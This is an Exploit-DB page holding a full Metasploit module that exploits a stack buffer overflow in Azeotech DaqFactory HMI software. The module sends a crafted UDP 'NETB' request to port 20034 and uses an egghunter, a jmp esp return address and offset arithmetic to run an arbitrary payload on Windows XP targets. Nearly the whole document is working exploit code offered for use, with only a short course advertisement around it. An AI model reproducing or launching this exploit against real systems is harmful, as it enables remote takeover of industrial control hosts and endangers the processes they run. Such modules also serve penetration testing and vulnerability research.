DaqFactory - HMI NETB Request Overflow (Metasploit)

EDB-ID:

17855




Platform:

Windows

Date:

2011-09-18


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux , the course required to become an Offensive Security Certified Professional (OSCP)

GET CERTIFIED

##
# $Id: daq_factory_bof.rb 13750 2011-09-18 02:45:55Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Udp
	include Msf::Exploit::Remote::Egghunter

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'DaqFactory HMI NETB Request Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in Azeotech's DaqFactory
				product. The specfic vulnerability is triggered when sending a specially crafted
				'NETB' request to port 20034. Exploitation of this vulnerability may take a few
				seconds due to the use of egghunter.  This vulnerability was one of the 14
				releases discovered by researcher Luigi Auriemma.
			},
			'Author'         =>
				[
					'Luigi Auriemma',  # Initial discovery, crash poc
					'mr_me <steventhomasseeley[at]gmail.com>',  # msf exploit
				],

			'Version'        => '$Revision: 13750 $',
			'References'     =>
				[
					['URL', 'http://aluigi.altervista.org/adv/daqfactory_1-adv.txt'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
					'InitialAutoRunScript' => 'migrate -f',
				},
			'Payload'        =>
				{
					'Space'    => 600,
					'BadChars' => "\x00",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[
						'DAQFactory Pro 5.85 Build 1853 on Windows XP SP3',
						{
							'Ret' => 0x100B9EDF,  # jmp esp PEGRP32A.dll
							'Offset' => 636,
						}
					],
				],
			'DisclosureDate' => 'Sep 13 2011',
			'DefaultTarget'  => 0))

		register_options(
			[
				# Required for EIP offset
				OptString.new('DHCP', [ true, "The DHCP server IP of the target", "" ]),
				Opt::RPORT(20034)
			], self.class)
	end

	def exploit
		connect_udp

		print_status("Trying target #{target.name}...")

		eggoptions ={
			:checksum => false,
			:eggtag => 'scar',
		}

		# Correct the offset according to the 2nd IP (DHCP) length
		iplen = datastore['DHCP'].length

		if iplen == 15
			offset = 78
		elsif iplen == 14
			offset = 79
		elsif iplen == 13
			offset = 80
		elsif iplen == 12
			offset = 81
		elsif iplen == 11
			offset = 82
		elsif iplen == 10
			offset = 83
		elsif iplen == 9
			offset = 84
		elsif iplen == 8
			offset = 85
		elsif iplen == 7
			offset = 86
		elsif iplen == 6
			offset = 87
		# attack class A ip, slightly unlikly, but just in case.
		elsif iplen == 5
			offset = 88	
		end	

		if offset >= 80
			pktoffset = offset - 80
			finaloffset = target['Offset']-pktoffset
		elsif offset <= 79
			pktoffset = 80 - offset
			finaloffset = target['Offset']+pktoffset
		end

		# springboard onto our unmodified payload
		p = Rex::Arch::X86.jmp(750) + payload.encoded
		hunter,egg = generate_egghunter(p, payload_badchars, eggoptions)

		sploit  = "NETB"  # NETB request overflow
		sploit << rand_text_alpha_upper(233)
		sploit << "\x00"  # part of the packet structure
		sploit << rand_text_alpha_upper(offset)  # include the offset for the DHCP address
		sploit << make_nops(2)
		sploit << hunter
		sploit << rand_text_alpha_upper(52-hunter.length-2)
		sploit << [target.ret].pack("V")
		sploit << rand_text_alpha_upper(12)
		sploit << Rex::Arch::X86.jmp_short(-70)
		sploit << egg
		# packetlen needs to be adjusted to a max of 0x400 as per advisory
		sploit << rand_text_alpha_upper(finaloffset-egg.length)

		# The use of rand_text_alpha_upper() ensures we always get the same length for the
		# first IP address. See the following for more details:
		# http://dev.metasploit.com/redmine/issues/5453
		sploit[12,4] = rand_text_alpha_upper(4)

		udp_sock.put(sploit)

		handler
		disconnect_udp
	end

end